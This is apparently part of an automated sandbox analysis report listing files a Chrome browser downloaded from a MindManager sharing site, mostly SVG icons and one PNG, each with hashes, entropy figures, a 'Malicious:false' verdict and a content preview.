                                                                Size (bytes):582
                                                                Entropy (8bit):5.024235650093528
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7B1E381A4BB2DF56C089A44E7990A221
                                                                SHA1:804EB7E5D9F28BD8107B2ACE74B9D9D37EDC486E
                                                                SHA-256:8B46FA374D8AD8A6FCC3C8B1E99D6012685497D201D0110802EFA1D0EC600610
                                                                SHA-512:A1A6AE300A6E2EC006AC60A93ED2FB592026FAE6883DF52E10A642D0A359CD441C599053A87FBE1B4B6005A5D98B0184747B039A3AA03D557195AF8D342F042C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/left-chevron.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 41 41">. <defs>. <style>.cls-1{fill:#fff;stroke:#3a52a4;stroke-miterlimit:10;}.cls-2{fill:#3a52a4;}</style>. </defs>. <title>back button</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <path class="cls-2". d="M24.25,29.48a.56.56,0,0,1-.19,0,.49.49,0,0,1-.17-.11l-9-9a.51.51,0,0,1,0-.71l9-9a.51.51,0,0,1,.71,0,.5.5,0,0,1,0,.7L15.95,20l8.65,8.64a.5.5,0,0,1,0,.7.49.49,0,0,1-.17.11A.53.53,0,0,1,24.25,29.48Z"/>. </g>. </g>.</svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):868
                                                                Entropy (8bit):5.207390525470283
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3B89C1129B1730A39373209D2A85D454
                                                                SHA1:22588DC641B670BD07C136AC66711845B873A065
                                                                SHA-256:D81EE84E278DF3712DA5E682FF7D11E3EF039D0954C7FED5AE1CC4E0CC792BD9
                                                                SHA-512:E0EDEACE53E77CBAE9DDA5FCDC616104238D831EA8644D0C9033DF2A77022B373A37DBF072B24B8CA74B5014650576BA08E41B5AD49C1FC47DF82804D4E97F1A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_collapse.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#4f87c6;}.cls-2{fill:#7db0df;}.cls-3{fill:#cbcacb;stroke:gray;stroke-miterlimit:10;}.cls-4{fill:#629f59;}</style></defs><title>context_collapse</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M9,6h1v5.47c0,.29-.42.53-.75.53H7V11H9Z"/><rect class="cls-2" x="0.5" y="10.5" width="8" height="4" rx="1.95"/><path class="cls-1" d="M6.55,11A1.45,1.45,0,0,1,8,12.45v.1A1.45,1.45,0,0,1,6.55,14H2.45A1.45,1.45,0,0,1,1,12.55v-.1A1.45,1.45,0,0,1,2.45,11h4.1m0-1H2.45A2.45,2.45,0,0,0,0,12.45v.1A2.45,2.45,0,0,0,2.45,15h4.1A2.45,2.45,0,0,0,9,12.55v-.1A2.45,2.45,0,0,0,6.55,10Z"/><rect class="cls-3" x="4.5" y="0.5" width="9" height="5" rx="2.37"/><polygon class="cls-4" points="13 8 10 12 12 12 12 16 14 16 14 12 16 12 13 8"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):706
                                                                Entropy (8bit):5.17093270484478
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FFE2B46EC99F6EE20689BFC816499071
                                                                SHA1:FE5606A3B37EC0EFDB951326E7446CEC9F6A85F0
                                                                SHA-256:35AE5978CCE3EC8AC2A0CED8E90001526FE37F846F41DACD5DDB9BDDA58316FE
                                                                SHA-512:FDE3693687CB8B91D9E02BAD9E8B036426D1BE63445840966F2EA74E2E2060E7F43D9898D5C5C9B7FB76894A3CE72124FF0BBC1BFCBED5ACFD6DE4E7BCE39BFE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/capture-success.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 44.86 44.86"><defs><style>.cls-1{fill:#3e9aff;}.cls-2{fill:#fff;stroke:#fff;stroke-miterlimit:10;}</style></defs><title>mobile-capture-buttons-success</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" width="44.86" height="44.86" transform="translate(0 44.86) rotate(-90)"/><path class="cls-2" d="M17.94,30.22a.38.38,0,0,1-.16-.12l-5-5a.45.45,0,0,1-.15-.35.49.49,0,0,1,.15-.35.45.45,0,0,1,.35-.14.46.46,0,0,1,.35.14l4.65,4.65L31.78,15.4a.49.49,0,0,1,.35-.15.45.45,0,0,1,.35.15.47.47,0,0,1,.15.35.49.49,0,0,1-.15.36l-14,14a.45.45,0,0,1-.16.12.63.63,0,0,1-.19,0A.58.58,0,0,1,17.94,30.22Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1251
                                                                Entropy (8bit):5.1612354692487346
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9A11E82E51ACDC3DC269CC0BE047E0D2
                                                                SHA1:0C4CA6651BD0A46B1C95B47EB608CB5D84BEDEAE
                                                                SHA-256:65D68E6040FC5D28F582C8DD5A48F9380CDFCDE4ACFE50CABAFC41ACACA340F8
                                                                SHA-512:530C8A005998F7CBB08A553A6842F5339A140B5E6C742680711B08B8AFFD5D39B0D1A9F3FD477D2E0CBA42488E7F2052227BC80218C5877D3B78A52A02629B68
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-terminal-arrow.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="60.7px"... height="36px" viewBox="0 0 60.7 36" enable-background="new 0 0 60.7 36" xml:space="preserve">..<g id="home">..</g>..<g id="save">..</g>..<g id="export">..</g>..<g id="edit">..</g>..<g id="copy">..</g>..<g id="paste">..</g>..<g id="cut">..</g>..<g id="delete">..</g>..<g id="add_floating">..</g>..<g id="add_sibling">..</g>..<g id="add_child">..</g>..<g id="add_callout">..</g>..<g id="add_image">..</g>..<g id="add_link">..</g>..<g id="add_attachment">..</g>..<g id="add_tag">..</g>..<g id="add_resource">..</g>..<g id="add_due_date">..</g>..<g id="add_progress">..</g>..<g id="undo">..</g>..<g id="redo">..</g>..<g id="customize_ui">..</g>..<g id="open_accordian_menu">..</g>..<g id="close_accordian_menu">..</g>..<g id="other">...<
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1180
                                                                Entropy (8bit):4.877997197005702
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:99BE2102246F2145836A3E3D7169BE75
                                                                SHA1:005FFA4003A080959A2B1C477031E160BAC80022
                                                                SHA-256:EC9947E8F5E1B63B54D6954A85710EACBC99A35095433C571ACC7E1DF35D2C9B
                                                                SHA-512:5BC8862D4CE3EDCD3FEEA05064735AF536BE464B58E1D9F24DAE1A369D7F383D0A0D56D00F781EBE3BF31445CC09AA049BD8D284E6E2F41C40A06E9F24AA6C9F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/redo.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1,.cls-2{fill:#1c97e6;}.cls-1{stroke:#1c97e6;stroke-miterlimit:10;stroke-width:2px;}</style></defs><title>arrow_6_16</title><path class="cls-1" d="M14.9,7.72a7,7,0,0,0-4.52-6.06A6.8,6.8,0,0,0,1.22,6.71,6.94,6.94,0,0,0,8,15v-.87A6.08,6.08,0,1,1,12.63,12h1.09A6.9,6.9,0,0,0,14.9,7.72Z"/><rect class="cls-2" x="10" y="14" width="1" height="1"/><rect class="cls-2" x="10" y="13" width="1" height="1"/><rect class="cls-2" x="10" y="11" width="1" height="1"/><rect class="cls-2" x="11" y="14" width="4" height="1"/><rect class="cls-2" x="11" y="11" width="4" height="1"/><rect class="cls-2" x="10" y="10" width="1" height="1"/><rect class="cls-2" x="13" y="10" width="1" height="1"/><rect class="cls-2" x="14" y="8" width="1" height="1"/><rect class="cls-2" x="15" y="9" width="1" height="1"/><rect class="cls-2" x="15" y="8" width="1" height="1"/><rect class="cls-2" x="15" y="7" width="1" heig
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):452
                                                                Entropy (8bit):5.163249108873183
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:47AE1082751C8F181A7A436BD45E25B9
                                                                SHA1:5B0D911B28F9830848B5B0ED99C4BDF5C6D8B909
                                                                SHA-256:78BBB3788E56069C8914D7C41FA792D0F65CDDA20D3D2FDE9B665BC5D994AAE6
                                                                SHA-512:769DDC807F2995125595A97C17E103F207AF26C45DBF9F757D4765D49421632B638130445DB59E5D198AF92ED18B5A61CA8C8608DC0E4AA9A54B26FE9A404395
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/zoom-out.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.35 1.65"><defs><style>.cls-1{fill:#3a52a4;stroke:#3a52a4;stroke-miterlimit:10;}</style></defs><title>2018 Publish - zoom minus</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M.82,1.15A.31.31,0,0,1,.6,1.06.31.31,0,0,1,.5.83.32.32,0,0,1,.6.59.31.31,0,0,1,.82.5h11.7a.32.32,0,0,1,.33.33.32.32,0,0,1-.09.23.32.32,0,0,1-.24.09Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):773
                                                                Entropy (8bit):5.433929002218767
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:16D7445B229DBF397CF6DC9D749F47FB
                                                                SHA1:4C73EBA466490BF9F55531B6FE6C64E93CD82CCA
                                                                SHA-256:C063895AAC0B80821438633D076162C98D4CB05DFEFBCE22A642B02F9683465F
                                                                SHA-512:7BEC5303B28E896FC9963BAE1FC996DFCD651BFF6BB799BEBB5940145643582C92AC384A587BFE1D619CEBFA4A07BADEA476518A5E3FCD59A12EAE310AF27631
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_layout_bottom.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="11.8px" height="15.3px" viewBox="0 0 11.8 15.3" enable-background="new 0 0 11.8 15.3" xml:space="preserve">..<g>...<path fill="#5c707c" d="M7.8,8.5H4c-2.2,0-4-1.8-4-4V4c0-2.2,1.8-4,4-4h3.8c2.2,0,4,1.8,4,4v0.5C11.8,6.7,10.1,8.5,7.8,8.5z M4,2....C2.9,2,2,2.9,2,4v0.5c0,1.1,0.9,2,2,2h3.8c1.1,0,2-0.9,2-2V4c0-1.1-0.9-2-2-2H4z"/>...<g>....<rect x="4.9" y="7.1" fill="#5c707c" width="2" height="4"/>....<g>.....<polygon fill="#5c707c" points="3.4,10.1 6.3,15.3 9.3,10.1 ..."/>....</g>...</g>..</g>..</svg>..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1333
                                                                Entropy (8bit):4.960602302138527
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:40AEFBAA769A0AEE6D9546A033AD2341
                                                                SHA1:74803F15AE1E47CEE4A843702BDD0DE8AF214E4A
                                                                SHA-256:36861C9FA1BCA1836ED2F9C2CF659DA8F838BFFBA0C94E7042A982A251EDAC10
                                                                SHA-512:998D662095DEB40416F54EDAE8CFEEA810A79E1594A97604E6E41CCD0C257F223D1FD06D2E0A64562AADE6D5B8489E98E907B5E6CE1D3A95D653193C386143DD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/onedrive.svg
                                                                Preview:<?xml version="1.0" encoding="iso-8859-1"?>. Generator: Adobe Illustrator 21.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 48 48" style="enable-background:new 0 0 48 48;" xml:space="preserve" width="50px" height="50px">.<g style="display:none;">.</g>.<path style="fill:#1565C0;" d="M40.429,35.999c0,0,2.89-0.393,3.47-3.185C43.964,32.502,44,32.161,44,31.787 c0-0.233-0.015-0.454-0.044-0.665c-0.428-3.158-3.852-3.868-3.852-3.868s0.595-3.401-2.543-5.183c-3.138-1.78-6.005,0-6.005,0 s-1.678-3.401-6.222-3.401c-5.843,0-6.817,6.64-6.817,6.64S13,25.636,13,30.493C13,35.352,18.031,36,18.031,36L40.429,35.999 L40.429,35.999z"/>.<path style="fill:#1565C0;" d="M11,30.493c0-4.395,3.286-6.319,5.875-6.945c0.898-2.954,3.384-6.878,8.46-6.878 c0.006,0,0.011,0.001,0.017,0.001c0.007,0,0.013-0.001,0.02-0.001c3.522,0,5.71,1.646,6.892,2.953 c0.65-0.191,1.448
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):1400
                                                                Entropy (8bit):7.808470583085035
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:333EE830E5AB72C41DD9126A27B4D878
                                                                SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                                SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                                SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3507
                                                                Entropy (8bit):4.815819032978108
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:41018E91EFCC56B8176732D94BDD24FF
                                                                SHA1:AC12DA932431E5BE767ADA95012B67458601A7AB
                                                                SHA-256:81CF294ADC3F3DA5463530E212762F933501B6368C10A0802477A8E767519B36
                                                                SHA-512:4B4E9C3B72D6A5368C9F1BCB40782451002D9432E1A3D3E76C7B069340E725CB06D614231326E99CAD5E99531684426A1B12226081BD49824E54FEEDA146F8AE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/hierarchicalorgchart.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M21.4746 57.8223L19.8418 57.8223C18.7372 57.8223 17.8418 56.9268 17.8418 55.8223L17.8418 39.6582C17.8418 37.6519 19.4683 36.0254 21.4746 36.0254V36.0254" stroke="#31514A" stroke-width="0.8"/>.<path d="M74.7559 57.8223L73.123 57.8223C72.0185 57.8223 71.123 56.9268 71.123 55.8223L71.123 39.6582C71.123 37.6519 72.7495 36.0254 74.7559 36.0254V36.0254" stroke="#D5A45F" stroke-width="0.8"/>.<path d="M128.037 57.8223L126.404 57.8223C125.3 57.8223 124.404 56.9268 124.404 55.8223L124.404 39.6582C124.404 37.6519 126.031 36.0254 128.037 36.0254V36.0254" stroke="#89B099" stroke-width="0.8"/>.<path d="M21.4746 69.9297L19.8418 69.9297C18.7372 69.9297 17.8418 69.0343 17.8418 67.9297L17.8418 39.6563C17.8418 37.65 19.4683 36.0235 21.4746 36.0235V36.0235" stroke="#28759F" stroke-width="0.8"/>.<path d="M21.4746 69.9297L19.8418 69.9297C18.7372 69.9297 17.8418 69.0343 17.8418 67.9297L17.8418 39.6563C1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2593
                                                                Entropy (8bit):4.944678100281193
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A78767833E14A8475903FC11C6523526
                                                                SHA1:61B1F3A5C41511AA9901EB6AAA944198DBD40195
                                                                SHA-256:3C025AF4EA1DAD86580484255465D043ECEEEB6FC7C755496E59F69FD6EEB1B3
                                                                SHA-512:68EB44BD5E4D8531762C05A97E2EDB6A170845BA3D16DDB3F29FC386677FE4551BA264FD2630C82FA1F6DE680D89F0E47CA574215741946A70E89D1CD4DEAC70
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/crossfunctionalflowcharth.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="22" y="29.043" width="27.043" height="126.33" rx="2" transform="rotate(-90 22 29.043)" fill="#F1F1F4"/>.<rect opacity="0.2" x="27.0547" y="12.8203" width="11.7908" height="1.54532" fill="#53535B"/>.<rect opacity="0.2" x="27.0547" y="15.9043" width="8.42197" height="1.54532" fill="#53535B"/>.<rect x="22" y="58.5273" width="27.043" height="126.33" rx="2" transform="rotate(-90 22 58.5273)" fill="#F1F1F4"/>.<rect opacity="0.2" x="27.0566" y="42.3066" width="11.7908" height="1.54532" fill="#53535B"/>.<rect opacity="0.2" x="27.0566" y="45.3887" width="8.42197" height="1.54532" fill="#53535B"/>.<rect x="22" y="88.002" width="27.043" height="126.33" rx="2" transform="rotate(-90 22 88.002)" fill="#F1F1F4"/>.<rect opacity="0.2" x="27.0566" y="71.7812" width="11.7908" height="1.54532" fill="#53535B"/>.<rect opacity="0.2" x="27.0566" y="74.8652" width="8.42197" height="1.54532" fill="#53535B"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4674
                                                                Entropy (8bit):5.341471692898965
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ACBB65466D82872011F5B41D057744DA
                                                                SHA1:43B30BF7B3514A2E3BF7D21516E50088D89FA9E6
                                                                SHA-256:0E914ECA9491E75988E6865EB78052AFD310077D02F10C268A872CFE64BC73B1
                                                                SHA-512:A5D5A11AAE4D0AD33E6ADB09DFF932424484A88548B4EF2F0FF06BD1EA047F9C107C0E6F7B6923BB54A1E1670F613B903D48EA3AF939A80EF805BCBE722F8068
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/msteams.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="Livello_1" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 2228.833 2073.333".. enable-background="new 0 0 2228.833 2073.333" xm
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):552
                                                                Entropy (8bit):5.119517864769435
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:94B004788CCD5F6FCBFF73696434FFF9
                                                                SHA1:AB0E275EEF846821D4E7A4D5B6976980D29FD030
                                                                SHA-256:A62E0F494C91FB1708C51652781D73A5CAC6171581C0CD8FE45384977E07897D
                                                                SHA-512:8C2BC3D77D5E36F51C77A10BA908A928599918432C4F88B653E16FE0D049BF1617FD31DA3038F7BF80B6980721655FB6630471347E9CF701876D77090C5CF8C6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_delete.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20"><defs><style>.cls-1{fill:#d25452;stroke:#ac1a14;stroke-miterlimit:10;}</style></defs><title>web app toolbar assets delete</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M12.12,10l6.94-6.94A1.5,1.5,0,0,0,16.94.94L10,7.88,3.06.94A1.5,1.5,0,0,0,.94,3.06L7.88,10,.94,16.94a1.49,1.49,0,0,0,0,2.12,1.5,1.5,0,0,0,2.12,0L10,12.12l6.94,6.94a1.5,1.5,0,0,0,2.12,0,1.49,1.49,0,0,0,0-2.12Z"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1663
                                                                Entropy (8bit):4.74869923833605
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5792F80A10A65516DD7995EF805E999F
                                                                SHA1:04C2C244957B9217A1EC42840F823113B4FA5AD3
                                                                SHA-256:F5829EEA50CEEE8780A374BF0A4B26AB03691E3FED0B01F2BBB2C25916CEBF37
                                                                SHA-512:E66046435580939B6109E91BD07181F3FE3C6FB80906311D99FC839E9D59420E1241AB584CBDBFBA31C03CCEE84E78FEDEEB5D182A3B20D54D41ED9641BC11F3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/judge-hammer.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#bc7f13;}.cls-2{fill:#9a9aa3;}.cls-3{fill:#fbb400;}</style></defs><title>gavel_16</title><rect class="cls-1" x="2.61" y="3.53" width="7.78" height="4.95" transform="translate(-2.34 6.35) rotate(-45)"/><rect class="cls-2" x="8.62" y="-0.96" width="1.2" height="7.83" rx="0.6" ry="0.6" transform="translate(0.61 7.39) rotate(-45)"/><rect class="cls-2" x="2.65" y="5" width="1.2" height="7.83" rx="0.6" ry="0.6" transform="translate(-5.35 4.92) rotate(-45)"/><rect class="cls-3" x="1" y="14" width="7" height="1" rx="0.49" ry="0.49"/><rect class="cls-1" y="15" width="9" height="1" rx="0.5" ry="0.5"/><rect class="cls-2" x="8" y="8" width="1" height="1"/><rect class="cls-2" x="9" y="9" width="1" height="1"/><rect class="cls-2" x="9" y="8" width="1" height="1"/><rect class="cls-2" x="10" y="9" width="1" height="1"/><rect class="cls-2" x="10" y="10" width="1" height="1"/><rect class
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):634
                                                                Entropy (8bit):4.959897059756935
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E336DA51EA7DACAF524ADC5DE564F5B1
                                                                SHA1:38B8ED4B6C4DEA40C4733A95D987147D37F7CDD0
                                                                SHA-256:1F92A30FB3E1F9BC8C23BB46AFB860AEA8D0CD4BEF1FC9A8F304AD7D87A4736D
                                                                SHA-512:2845D6835A7DE29DDA1165DE191FA77CA633D41EAFA13C94682A19B0FA13395A648E05B058A26C05FF65101813DDDD05FFF0AA012E0DFBCBA18EC822D5561113
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_attachmentmulti.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}</style></defs><title>topic_info_icon_attachmentmulti</title><path class="cls-1" d="M8.94,6.06,8.5,5.59l-4.22,4C3.15,10.68,2.76,12.11,3.55,13s2.25.52,3.38-.56l6-5.7a3.31,3.31,0,0,0,.3-4.7,3.3,3.3,0,0,0-4.71.06L2.4,7.85a4.62,4.62,0,0,0-.33,6.51,4.62,4.62,0,0,0,6.51,0l4.33-4.12-.44-.47L8.14,13.89a4,4,0,0,1-5.61,0,4,4,0,0,1,.31-5.6L9,2.51a2.67,2.67,0,0,1,3.82-.09,2.67,2.67,0,0,1-.29,3.81l-6,5.7c-.87.82-1.92,1.17-2.48.58s-.15-1.62.71-2.44Z"/><polygon class="cls-1" points="16 13 13.5 15.62 11 13 16 13"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):81321
                                                                Entropy (8bit):4.174133726719008
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:570453BCF19B183E7E6A5CF2D0445723
                                                                SHA1:EE3D1E4AFABF3F9706B59F748F88432AD0A4CEEF
                                                                SHA-256:7AC5A88248754AB0C333508291AF149777391A07F2FA2495855816E38180E4F7
                                                                SHA-512:CD8D1DDC68C3BEEB8CF38509C60C85686187B1F07091A73061F6E78B854AADE42B49DAAB2B4D182F109EA217EC1C2CBBDC86EC8153B9308BDBE697B375A10FEA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_organization.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_9320)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#D6E6FB"/>..<g clip-path="url(#clip1_456_9320)">..<path opacity="0.5" d="M607.049 68.1206C620.624 86.5118 622.629 110.82 614.734 131.74C606.839 152.661 589.793 170.211 569.255 182.264C542.468 197.984 508.139 204.707 477.763 195.77C447.387 186.834 422.898 160.518 423.183 131.698C423.32 117.847 429.989 103.091 443.635 96.7335C456.786 90.6059 473.326 93.4074 486.588 87.476C510.349 76.8487 514.707 45.3259 543.136 39.9048C565.694 35.6044 595.104 51.9394 607.049 68.1206Z" fill="#9CC5FB"/>..<path d="M451.992 7.88281H606.243C608.315 7.88281 609.996 9.56307 609.996 11.6358V106.389C609.996 108.462 608.315 110.142 606.243 110.142H451.992C449.92 110.142 448.239
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1307
                                                                Entropy (8bit):5.1711964295580515
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:292BB2F141835E90BBFBBA673A57B787
                                                                SHA1:ADB59B54B413D93F7000C692DE8114266E0F4457
